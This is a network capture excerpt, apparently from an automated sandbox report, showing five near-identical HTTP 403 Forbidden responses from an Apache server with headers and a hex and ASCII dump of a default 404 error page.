                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:29.114398003 CEST14368INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:29 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=110
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:30.230047941 CEST14376INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:30 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=129
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:31.156063080 CEST14384INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:31 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=116
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:32.204792976 CEST14392INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:32 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=123
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:33.053590059 CEST14400INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:33 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=114
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
